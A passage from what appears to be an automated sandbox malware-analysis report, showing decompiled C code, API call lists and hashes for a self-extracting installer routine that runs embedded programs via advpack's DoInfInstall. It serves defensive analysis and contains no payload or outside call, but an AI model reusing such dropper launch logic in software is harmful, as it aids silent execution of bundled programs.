                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 001069E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00106A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: 48ba07bb662f68a91d0c8d0413d1bfda5dabe796f5918882a5220416987eb0c9
                                                                                                                                                                                                                                                • Instruction ID: 17b34b2a1482e90e278211b55b71077f95117bf4aa41fe163887cefaaaead0ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48ba07bb662f68a91d0c8d0413d1bfda5dabe796f5918882a5220416987eb0c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F0927050C3018FE759AB34AE0A6087BA1FB15321B504A29F4E286AE1CFFA95D58A15
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                • Disassembly available

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E3BA2() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				short _v300;
                                                                                                                                                                                                                                                				intOrPtr _v304;
                                                                                                                                                                                                                                                				void _v348;
                                                                                                                                                                                                                                                				char _v352;
                                                                                                                                                                                                                                                				intOrPtr _v356;
                                                                                                                                                                                                                                                				signed int _v360;
                                                                                                                                                                                                                                                				short _v364;
                                                                                                                                                                                                                                                				char* _v368;
                                                                                                                                                                                                                                                				intOrPtr _v372;
                                                                                                                                                                                                                                                				void* _v376;
                                                                                                                                                                                                                                                				intOrPtr _v380;
                                                                                                                                                                                                                                                				char _v384;
                                                                                                                                                                                                                                                				signed int _v388;
                                                                                                                                                                                                                                                				intOrPtr _v392;
                                                                                                                                                                                                                                                				signed int _v396;
                                                                                                                                                                                                                                                				signed int _v400;
                                                                                                                                                                                                                                                				signed int _v404;
                                                                                                                                                                                                                                                				void* _v408;
                                                                                                                                                                                                                                                				void* _v424;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                				short _t96;
                                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                                                				int _t112;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				signed char _t118;
                                                                                                                                                                                                                                                				void* _t125;
                                                                                                                                                                                                                                                				signed int _t127;
                                                                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                                				void* _t130;
                                                                                                                                                                                                                                                				short _t137;
                                                                                                                                                                                                                                                				char* _t140;
                                                                                                                                                                                                                                                				signed char _t144;
                                                                                                                                                                                                                                                				signed char _t145;
                                                                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                                                                				void* _t150;
                                                                                                                                                                                                                                                				void* _t151;
                                                                                                                                                                                                                                                				signed int _t153;
                                                                                                                                                                                                                                                				void* _t155;
                                                                                                                                                                                                                                                				void* _t156;
                                                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                                                				signed int _t162;
                                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                                				void* _t165;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                                				_t69 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                                				_t153 = 0;
                                                                                                                                                                                                                                                				 *0x10e9124 =  *0x10e9124 & 0;
                                                                                                                                                                                                                                                				_t149 = 0;
                                                                                                                                                                                                                                                				_v388 = 0;
                                                                                                                                                                                                                                                				_v384 = 0;
                                                                                                                                                                                                                                                				_t165 =  *0x10e8a28 - _t153; // 0x0
                                                                                                                                                                                                                                                				if(_t165 != 0) {
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t127 = 0;
                                                                                                                                                                                                                                                					_v392 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                                						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                                						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                                						_v348 = 0x44;
                                                                                                                                                                                                                                                						if( *0x10e8c42 != 0) {
                                                                                                                                                                                                                                                							goto L26;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t146 =  &_v396;
                                                                                                                                                                                                                                                						_t115 = E010E468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                                						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                                							_t146 = 0x4b1;
                                                                                                                                                                                                                                                							E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                							 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                							goto L62;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(_v396 != 1) {
                                                                                                                                                                                                                                                								__eflags = _v396 - 2;
                                                                                                                                                                                                                                                								if(_v396 != 2) {
                                                                                                                                                                                                                                                									_t137 = 3;
                                                                                                                                                                                                                                                									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                                									if(_v396 == _t137) {
                                                                                                                                                                                                                                                										_v304 = 1;
                                                                                                                                                                                                                                                										_v300 = _t137;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(6);
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                                								goto L11;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								L11:
                                                                                                                                                                                                                                                								_v300 = 0;
                                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                                								if(_t127 != 0) {
                                                                                                                                                                                                                                                									L27:
                                                                                                                                                                                                                                                									_t155 = 1;
                                                                                                                                                                                                                                                									__eflags = _t127 - 1;
                                                                                                                                                                                                                                                									if(_t127 != 1) {
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t132 =  &_v280;
                                                                                                                                                                                                                                                										_t76 = E010E1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                                                                											L62:
                                                                                                                                                                                                                                                											_t77 = 0;
                                                                                                                                                                                                                                                											L63:
                                                                                                                                                                                                                                                											_pop(_t150);
                                                                                                                                                                                                                                                											_pop(_t156);
                                                                                                                                                                                                                                                											_pop(_t128);
                                                                                                                                                                                                                                                											return E010E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t157 = _v404;
                                                                                                                                                                                                                                                										__eflags = _t149;
                                                                                                                                                                                                                                                										if(_t149 != 0) {
                                                                                                                                                                                                                                                											L37:
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												L57:
                                                                                                                                                                                                                                                												_t151 = _v408;
                                                                                                                                                                                                                                                												_t146 =  &_v352;
                                                                                                                                                                                                                                                												_t130 = _t151; // executed
                                                                                                                                                                                                                                                												_t79 = E010E3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                                												__eflags = _t79;
                                                                                                                                                                                                                                                												if(_t79 == 0) {
                                                                                                                                                                                                                                                													L61:
                                                                                                                                                                                                                                                													LocalFree(_t151);
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												L58:
                                                                                                                                                                                                                                                												LocalFree(_t151);
                                                                                                                                                                                                                                                												_t127 = _t127 + 1;
                                                                                                                                                                                                                                                												_v396 = _t127;
                                                                                                                                                                                                                                                												__eflags = _t127 - 2;
                                                                                                                                                                                                                                                												if(_t127 >= 2) {
                                                                                                                                                                                                                                                													_t155 = 1;
                                                                                                                                                                                                                                                													__eflags = 1;
                                                                                                                                                                                                                                                													L69:
                                                                                                                                                                                                                                                													__eflags =  *0x10e8580;
                                                                                                                                                                                                                                                													if( *0x10e8580 != 0) {
                                                                                                                                                                                                                                                														E010E2267();
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													_t77 = _t155;
                                                                                                                                                                                                                                                													goto L63;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t153 = _v392;
                                                                                                                                                                                                                                                												_t149 = _v388;
                                                                                                                                                                                                                                                												continue;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											L38:
                                                                                                                                                                                                                                                											__eflags =  *0x10e8180;
                                                                                                                                                                                                                                                											if( *0x10e8180 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c7;
                                                                                                                                                                                                                                                												E010E44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                												LocalFree(_v424);
                                                                                                                                                                                                                                                												 *0x10e9124 = 0x8007042b;
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x10e9a34 & 0x00000004;
                                                                                                                                                                                                                                                											if(__eflags == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t129 = E010E6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                                											__eflags = _t129;
                                                                                                                                                                                                                                                											if(_t129 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c8;
                                                                                                                                                                                                                                                												E010E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                                												L65:
                                                                                                                                                                                                                                                												LocalFree(_v408);
                                                                                                                                                                                                                                                												 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                                											_v404 = _t146;
                                                                                                                                                                                                                                                											__eflags = _t146;
                                                                                                                                                                                                                                                											if(_t146 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c9;
                                                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                                                												E010E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                                												FreeLibrary(_t129);
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x10e8a30;
                                                                                                                                                                                                                                                											_t151 = _v408;
                                                                                                                                                                                                                                                											_v384 = 0;
                                                                                                                                                                                                                                                											_v368 =  &_v280;
                                                                                                                                                                                                                                                											_t96 =  *0x10e9a40; // 0x3
                                                                                                                                                                                                                                                											_v364 = _t96;
                                                                                                                                                                                                                                                											_t97 =  *0x10e8a38 & 0x0000ffff;
                                                                                                                                                                                                                                                											_v380 = 0x10e9154;
                                                                                                                                                                                                                                                											_v376 = _t151;
                                                                                                                                                                                                                                                											_v372 = 0x10e91e4;
                                                                                                                                                                                                                                                											_v360 = _t97;
                                                                                                                                                                                                                                                											if( *0x10e8a30 != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t144 =  *0x10e9a34; // 0x1
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t145 =  *0x10e8d48; // 0x0
                                                                                                                                                                                                                                                											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                                											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t145;
                                                                                                                                                                                                                                                											if(_t145 < 0) {
                                                                                                                                                                                                                                                												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                                												__eflags = _t104;
                                                                                                                                                                                                                                                												_v360 = _t104;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t98 =  *0x10e9a38; // 0x0
                                                                                                                                                                                                                                                											_v356 = _t98;
                                                                                                                                                                                                                                                											_t130 = _t146;
                                                                                                                                                                                                                                                											 *0x10ea288( &_v384);
                                                                                                                                                                                                                                                											_t101 = _v404();
                                                                                                                                                                                                                                                											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                                											if(_t164 != _t164) {
                                                                                                                                                                                                                                                												_t130 = 4;
                                                                                                                                                                                                                                                												asm("int 0x29");
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											 *0x10e9124 = _t101;
                                                                                                                                                                                                                                                											_push(_t129);
                                                                                                                                                                                                                                                											__eflags = _t101;
                                                                                                                                                                                                                                                											if(_t101 < 0) {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												goto L61;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												_t127 = _v400;
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x10e9a40 - 1; // 0x3
                                                                                                                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x10e8a20;
                                                                                                                                                                                                                                                										if( *0x10e8a20 == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t157;
                                                                                                                                                                                                                                                										if(_t157 != 0) {
                                                                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                										E010E202A(_t146); // executed
                                                                                                                                                                                                                                                										goto L37;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v280;
                                                                                                                                                                                                                                                									_t108 = E010E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                                									__eflags = _t108;
                                                                                                                                                                                                                                                									if(_t108 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x10e8c42;
                                                                                                                                                                                                                                                									if( *0x10e8c42 != 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                                									__eflags = _t112 == 0;
                                                                                                                                                                                                                                                									if(_t112 == 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t118 =  *0x10e8a38; // 0x0
                                                                                                                                                                                                                                                								if(_t118 == 0) {
                                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                                									if(_t153 != 0) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E010E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                                										goto L27;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                                									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                										goto L62;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t140 = "USRQCMD";
                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E010E468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                                										_t153 = 1;
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                                						_push(_t130);
                                                                                                                                                                                                                                                						_t146 = 0x104;
                                                                                                                                                                                                                                                						E010E1781( &_v276, 0x104, _t130, 0x10e8c42);
                                                                                                                                                                                                                                                						goto L27;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t130 = "REBOOT";
                                                                                                                                                                                                                                                				_t125 = E010E468F(_t130, 0x10e9a2c, 4);
                                                                                                                                                                                                                                                				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                                0x010e3c58
                                                                                                                                                                                                                                                0x010e3c58
                                                                                                                                                                                                                                                0x010e3c6e
                                                                                                                                                                                                                                                0x010e3c6e
                                                                                                                                                                                                                                                0x010e3c87
                                                                                                                                                                                                                                                0x010e3c89
                                                                                                                                                                                                                                                0x010e3d4d
                                                                                                                                                                                                                                                0x010e3d4f
                                                                                                                                                                                                                                                0x010e3d50
                                                                                                                                                                                                                                                0x010e3d52
                                                                                                                                                                                                                                                0x010e3d9e
                                                                                                                                                                                                                                                0x010e3da8
                                                                                                                                                                                                                                                0x010e3daf
                                                                                                                                                                                                                                                0x010e3db4
                                                                                                                                                                                                                                                0x010e3db6
                                                                                                                                                                                                                                                0x010e3f4d
                                                                                                                                                                                                                                                0x010e3f4d
                                                                                                                                                                                                                                                0x010e3f4f
                                                                                                                                                                                                                                                0x010e3f56
                                                                                                                                                                                                                                                0x010e3f57
                                                                                                                                                                                                                                                0x010e3f58
                                                                                                                                                                                                                                                0x010e3f63
                                                                                                                                                                                                                                                0x010e3f63
                                                                                                                                                                                                                                                0x010e3dbc
                                                                                                                                                                                                                                                0x010e3dc0
                                                                                                                                                                                                                                                0x010e3dc2
                                                                                                                                                                                                                                                0x010e3de6
                                                                                                                                                                                                                                                0x010e3de6
                                                                                                                                                                                                                                                0x010e3de8
                                                                                                                                                                                                                                                0x010e3f0b
                                                                                                                                                                                                                                                0x010e3f0b
                                                                                                                                                                                                                                                0x010e3f0f
                                                                                                                                                                                                                                                0x010e3f13
                                                                                                                                                                                                                                                0x010e3f15
                                                                                                                                                                                                                                                0x010e3f1a
                                                                                                                                                                                                                                                0x010e3f1c
                                                                                                                                                                                                                                                0x010e3f46
                                                                                                                                                                                                                                                0x010e3f47
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f47
                                                                                                                                                                                                                                                0x010e3f1e
                                                                                                                                                                                                                                                0x010e3f1f
                                                                                                                                                                                                                                                0x010e3f25
                                                                                                                                                                                                                                                0x010e3f26
                                                                                                                                                                                                                                                0x010e3f2a
                                                                                                                                                                                                                                                0x010e3f2d
                                                                                                                                                                                                                                                0x010e3fd9
                                                                                                                                                                                                                                                0x010e3fd9
                                                                                                                                                                                                                                                0x010e3fda
                                                                                                                                                                                                                                                0x010e3fda
                                                                                                                                                                                                                                                0x010e3fe1
                                                                                                                                                                                                                                                0x010e3fe3
                                                                                                                                                                                                                                                0x010e3fe3
                                                                                                                                                                                                                                                0x010e3fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3fe8
                                                                                                                                                                                                                                                0x010e3f33
                                                                                                                                                                                                                                                0x010e3f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f37
                                                                                                                                                                                                                                                0x010e3dee
                                                                                                                                                                                                                                                0x010e3dee
                                                                                                                                                                                                                                                0x010e3df5
                                                                                                                                                                                                                                                0x010e3fad
                                                                                                                                                                                                                                                0x010e3fb9
                                                                                                                                                                                                                                                0x010e3fc2
                                                                                                                                                                                                                                                0x010e3fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3fc8
                                                                                                                                                                                                                                                0x010e3dfb
                                                                                                                                                                                                                                                0x010e3dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3e03
                                                                                                                                                                                                                                                0x010e3e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3e15
                                                                                                                                                                                                                                                0x010e3e17
                                                                                                                                                                                                                                                0x010e3e19
                                                                                                                                                                                                                                                0x010e3f94
                                                                                                                                                                                                                                                0x010e3fa4
                                                                                                                                                                                                                                                0x010e3f7c
                                                                                                                                                                                                                                                0x010e3f80
                                                                                                                                                                                                                                                0x010e3f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f8b
                                                                                                                                                                                                                                                0x010e3e2c
                                                                                                                                                                                                                                                0x010e3e30
                                                                                                                                                                                                                                                0x010e3e34
                                                                                                                                                                                                                                                0x010e3e36
                                                                                                                                                                                                                                                0x010e3f69
                                                                                                                                                                                                                                                0x010e3f6e
                                                                                                                                                                                                                                                0x010e3f70
                                                                                                                                                                                                                                                0x010e3f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f76
                                                                                                                                                                                                                                                0x010e3e3c
                                                                                                                                                                                                                                                0x010e3e43
                                                                                                                                                                                                                                                0x010e3e47
                                                                                                                                                                                                                                                0x010e3e52
                                                                                                                                                                                                                                                0x010e3e56
                                                                                                                                                                                                                                                0x010e3e5c
                                                                                                                                                                                                                                                0x010e3e61
                                                                                                                                                                                                                                                0x010e3e68
                                                                                                                                                                                                                                                0x010e3e70
                                                                                                                                                                                                                                                0x010e3e74
                                                                                                                                                                                                                                                0x010e3e7c
                                                                                                                                                                                                                                                0x010e3e80
                                                                                                                                                                                                                                                0x010e3e82
                                                                                                                                                                                                                                                0x010e3e82
                                                                                                                                                                                                                                                0x010e3e87

APIs
• memset.MSVCRT ref: 010E3C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010E3CDC
  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010E8C42), ref: 010E3D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010E3E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010E8C42), ref: 010E3F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-3053180130
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v527;
                                                                                                                                                                                                                                                				char _v528;
